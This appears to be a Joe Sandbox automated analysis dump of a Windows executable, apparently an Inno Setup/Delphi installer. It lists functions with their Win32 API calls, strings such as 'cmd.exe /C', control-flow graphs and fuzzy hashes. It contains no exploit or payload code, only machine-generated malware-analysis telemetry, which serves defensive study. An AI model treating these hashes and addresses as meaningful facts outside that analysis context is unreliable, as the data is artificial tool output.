                                                                                • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                                • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                                • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                                • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                                • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                • String ID:
                                                                                • API String ID: 183575631-0
                                                                                • Opcode ID: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
                                                                                • Instruction ID: c8b20579a229f032ee7a03b4d787949f367ffe63dd75f0d430c9c3a529dbdbac
                                                                                • Opcode Fuzzy Hash: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
                                                                                • Instruction Fuzzy Hash: 813172B17402006AEB10AF65AC82F6B36989B14308F10017BFA40AE2D3C6BDDD40876D
                                                                                Function 004674EC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 141windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2646 4674ec-467596 call 41462c call 41464c call 41462c call 41464c SHGetFileInfo 2655 4675cb-4675d6 call 478d20 2646->2655 2656 467598-46759f 2646->2656 2661 467627-46763a call 47cff4 2655->2661 2662 4675d8-46761d call 42c40c call 40357c call 403738 ExtractIconA call 46742c 2655->2662 2656->2655 2658 4675a1-4675c6 ExtractIconA call 46742c 2656->2658 2658->2655 2668 46763c-467646 call 47cff4 2661->2668 2669 46764b-46764f 2661->2669 2684 467622 2662->2684 2668->2669 2671 467651-467674 call 403738 SHGetFileInfo 2669->2671 2672 4676a9-4676dd call 403400 * 2 2669->2672 2671->2672 2680 467676-46767d 2671->2680 2680->2672 2683 46767f-4676a4 ExtractIconA call 46742c 2680->2683 2683->2672 2684->2672
                                                                                APIs
                                                                                • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                                                • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                                                  • Part of subcall function 0046742C: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 004674C4
                                                                                  • Part of subcall function 0046742C: DestroyCursor.USER32(00000000), ref: 004674DA
                                                                                • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                                                • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046766D
                                                                                • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467693
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                • String ID: c:\directory$k H$shell32.dll
                                                                                • API String ID: 3376378930-433663191
                                                                                • Opcode ID: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
                                                                                • Instruction ID: 265839c963417482dd86c951db209f81288bb0a388fd09f062db7983cc26d63d
                                                                                • Opcode Fuzzy Hash: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
                                                                                • Instruction Fuzzy Hash: B2516070604604AFDB10EF69CD89FDFB7E8EB48318F1081A6F9049B391D6399E81CA59
                                                                                Function 0042F570 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90windowregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2688 42f570-42f57a 2689 42f584-42f5c1 call 402b30 GetActiveWindow GetFocus call 41eeb4 2688->2689 2690 42f57c-42f57f call 402d30 2688->2690 2696 42f5d3-42f5db 2689->2696 2697 42f5c3-42f5cd RegisterClassA 2689->2697 2690->2689 2698 42f662-42f67e SetFocus call 403400 2696->2698 2699 42f5e1-42f612 CreateWindowExA 2696->2699 2697->2696 2699->2698 2701 42f614-42f658 call 42428c call 403738 CreateWindowExA 2699->2701 2701->2698 2707 42f65a-42f65d ShowWindow 2701->2707 2707->2698
                                                                                APIs
                                                                                • GetActiveWindow.USER32 ref: 0042F59F
                                                                                • GetFocus.USER32 ref: 0042F5A7
                                                                                • RegisterClassA.USER32(004997AC), ref: 0042F5C8
                                                                                • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F69C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F606
                                                                                • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F64C
                                                                                • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F65D
                                                                                • SetFocus.USER32(00000000,00000000,0042F67F,?,?,?,00000001,00000000,?,00458696,00000000,0049B628), ref: 0042F664
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                • String ID: TWindowDisabler-Window
                                                                                • API String ID: 3167913817-1824977358
                                                                                • Opcode ID: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
                                                                                • Instruction ID: 092f1afd63313efa57bcf667ad1f00c9caddf595d34af2871f870ebe591ae418
                                                                                • Opcode Fuzzy Hash: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
                                                                                • Instruction Fuzzy Hash: 20219F70740710BAE710EF62AD03F1A76A8EB04B04FA1413AF504AB2D1D7B96D5586ED
                                                                                Function 004531DC Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                • API String ID: 1646373207-2130885113
                                                                                • Opcode ID: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
                                                                                • Instruction ID: 5e931287d6eebe3694b70f0ad3549e6df422da746536320e83a51589c54bb73f
                                                                                • Opcode Fuzzy Hash: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
                                                                                • Instruction Fuzzy Hash: 5B017570240B45AFD711AF73AD02F167658E705B57F6044BBFC0096286D77C8A088EAD
                                                                                Function 0047C800 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C893
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C89C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
                                                                                • API String ID: 1375471231-1421604804
                                                                                • Opcode ID: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
                                                                                • Instruction ID: 2e7cf1fa8793a22cdcb7cccf6aa375e82942df810c5d1ff78a46bc34c798803d
                                                                                • Opcode Fuzzy Hash: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
                                                                                • Instruction Fuzzy Hash: 65411474A001099BDB00EFA5D8C2ADEB7B9EB44309F50857BE91477392DB389E058B69
                                                                                Function 00430950 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430958
                                                                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430967
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00430981
                                                                                • GlobalAddAtomA.KERNEL32(00000000), ref: 004309A2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                • API String ID: 4130936913-2943970505
                                                                                • Opcode ID: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                                                • Instruction ID: fe08fc0df2a0eca0a869f0df0621173a2940aa0bc2523ddfe777e35bb070d714
                                                                                • Opcode Fuzzy Hash: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                                                • Instruction Fuzzy Hash: 30F082B0958340CEE300EB25994271A7BE0EF58318F00467FF498A63E2D7399900CB5F
                                                                                Function 004723E4 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 263fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 00472591
                                                                                • FindClose.KERNEL32(000000FF,004725BC,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004725AF
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 004726B3
                                                                                • FindClose.KERNEL32(000000FF,004726DE,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004726D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileNext
                                                                                • String ID: "*G$"*G
                                                                                • API String ID: 2066263336-450946878
                                                                                • Opcode ID: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
                                                                                • Instruction ID: 3872decae14ce2498a692a517acaa1cf84d86a609609514027ee2c14d85ef847
                                                                                • Opcode Fuzzy Hash: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
                                                                                • Instruction Fuzzy Hash: 6CB13E7490424DAFCF11DFA5C981ADEBBB9FF49304F5081AAE808B3251D7789A46CF58
                                                                                Function 00454FFC Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 154COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218,00000000), ref: 004551A6
                                                                                • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218), ref: 004551B3
                                                                                  • Part of subcall function 00454F68: WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                                                  • Part of subcall function 00454F68: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                                                  • Part of subcall function 00454F68: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                                                  • Part of subcall function 00454F68: CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                • API String ID: 854858120-615399546
                                                                                • Opcode ID: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
                                                                                • Instruction ID: 314af404618b4f06b129018ed763823481dfe4f790e250d6c958622b2bfe97d6
                                                                                • Opcode Fuzzy Hash: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
                                                                                • Instruction Fuzzy Hash: 12515A30A0074DABDB11EF95C892BEEBBB9AF44705F50407BB804B7282D7785A49CB59
                                                                                Function 0042369C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                • OemToCharA.USER32(?,?), ref: 0042376C
                                                                                • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Char$FileIconLoadLowerModuleName
                                                                                • String ID: 2$MAINICON
                                                                                • API String ID: 3935243913-3181700818
                                                                                • Opcode ID: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                                                • Instruction ID: fd9f9c5161a85cdd37c149357dc6ae372d2e201a3957992c444bec056041847b
                                                                                • Opcode Fuzzy Hash: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                                                • Instruction Fuzzy Hash: 89319270A042549ADF14EF2998857C67BE8AF14308F4441BAE844DB393D7BED988CB99
                                                                                Function 00418F48 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                                • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                                • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                                  • Part of subcall function 004230D8: 73E9A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                  • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                  • Part of subcall function 004230D8: 73EA4620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                  • Part of subcall function 004230D8: 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                  • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                  • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                  • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                                  • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                  • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                  • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                  • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                  • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A4620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                • API String ID: 1580766901-2767913252
                                                                                • Opcode ID: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                                                • Instruction ID: 147b0fd3ac44816fa50e213e98ef70cab9cb63b371fef283777c7ccc396f8742
                                                                                • Opcode Fuzzy Hash: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                                                • Instruction Fuzzy Hash: BB112EB06142409AC740FF76A94265A7BE1DB64318F40843FF448EB2D1DB7D99448B5F
                                                                                Function 0041364C Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                                • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                                • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$Prop
                                                                                • String ID:
                                                                                • API String ID: 3887896539-0
                                                                                • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                                • Instruction ID: 955d73ee8c9e489f8eb805393a0cdbf9fe7b6d9765079e051d97cf620cdedb95
                                                                                • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                                • Instruction Fuzzy Hash: D811C975500248BFDB00DF9DDC84EDA3BE8EB19364F144666B918DB2A1D738DD908BA8
                                                                                Function 004556C4 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
